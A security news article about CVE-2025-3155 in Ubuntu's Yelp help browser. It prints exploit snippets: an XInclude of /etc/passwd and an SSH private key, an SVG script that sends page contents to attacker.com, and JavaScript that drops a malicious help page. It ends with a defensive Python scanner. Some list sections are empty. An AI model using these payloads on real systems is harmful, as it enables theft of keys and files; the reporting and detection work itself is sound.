Security researchers have uncovered a critical vulnerability (CVE-2025-3155) in Ubuntu’s default help browser Yelp that could expose sensitive system files including SSH private keys.
The flaw impacts Ubuntu desktop installations and stems from improper handling of XML content in GNOME’s help documentation system.
Affected Systems:
Vulnerability Chain:
<include href="/etc/passwd" xmlns="http://www.w3.org/2001/XInclude"/>
<svg:script>onload=_=>fetch("http://attacker.com", {body:document.body})</svg:script>
Attack Scenario Walkthrough
Key Exploit Code Snippet:
<script>
let payloadPage = `<?xml...>
<include href="/proc/self/cwd/.ssh/id_rsa"/>
<svg:script>onload=_=>fetch("http://attacker.com",...)</svg:script>`;
function exp() {
const blob = new Blob([payloadPage], {type: 'text/plain'});
const a = document.createElement('a');
a.href = URL.createObjectURL(blob);
a.download = 'index.page';
a.click();
location = 'ghelp:///proc/self/cwd/Downloads';
}
</script>
Canonical has released patches in Ubuntu security updates dated April 7, 2025. Users are urged to apply updates immediately through standard package channels.
This vulnerability demonstrates three critical risks:
A security researcher noted: “This chain shows how apparently harmless documentation tools can become attack vectors when combined with modern web technologies. The ghelp:// handler’s file inclusion capabilities create unexpected trust boundaries.”
Investigations are ongoing to determine whether this vulnerability was exploited in the wild. Users and enterprises are advised to audit SSH key usage and monitor for suspicious authentication attempts.
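As a defensive complement to the audit advice above, the following added example (not code from the researchers or from Canonical) flags downloaded .page help files that contain an XInclude reaching outside their own directory or a script element, the two markers visible in the snippets above. The function names, the constructed sample document, and the ~/Downloads default are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET
from pathlib import Path

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"  # namespace shown in the article's snippet
# Fallback patterns for files that are not well-formed XML (triage only).
RAW_INCLUDE = re.compile(r"<(?:\w+:)?include\b[^>]*\bhref\s*=\s*[\"']([^\"']+)", re.I)
RAW_SCRIPT = re.compile(r"<(?:\w+:)?script\b", re.I)
# Constructed sample for testing the scanner; not a captured file.
SAMPLE = b"""<page xmlns:xi="http://www.w3.org/2001/XInclude"
      xmlns:svg="http://www.w3.org/2000/svg">
  <xi:include href="/etc/passwd" parse="text"/>
  <svg:script/>
</page>"""

def risky_href(href):
    """True if an include target is absolute, has a URL scheme, or climbs with '..'."""
    return href.startswith("/") or "://" in href or ".." in href.split("/")

def scan_page(data):
    """Return findings for one help page given as bytes (empty list = nothing flagged)."""
    try:
        root = ET.fromstring(data)  # ElementTree does not resolve XInclude while parsing
    except ET.ParseError:
        text = data.decode("utf-8", "replace")
        found = [f"include:{h}" for h in RAW_INCLUDE.findall(text) if risky_href(h)]
        return found + (["script"] if RAW_SCRIPT.search(text) else [])
    found = []
    for el in root.iter():
        ns, _, local = el.tag.rpartition("}")
        if ns == "{" + XINCLUDE_NS and local == "include" and risky_href(el.get("href", "")):
            found.append(f"include:{el.get('href')}")
        elif local == "script":
            found.append("script")
    return found

def scan_dir(directory):
    """Map each flagged *.page file under directory to its findings."""
    hits = {}
    for path in Path(directory).expanduser().rglob("*.page"):
        found = scan_page(path.read_bytes())
        if found:
            hits[str(path)] = found
    return hits

if __name__ == "__main__":
    for name, found in scan_dir("~/Downloads").items():
        print(name, found)
```

A hit is a prompt for manual review rather than proof of compromise; an include with a relative target inside the same directory is not flagged.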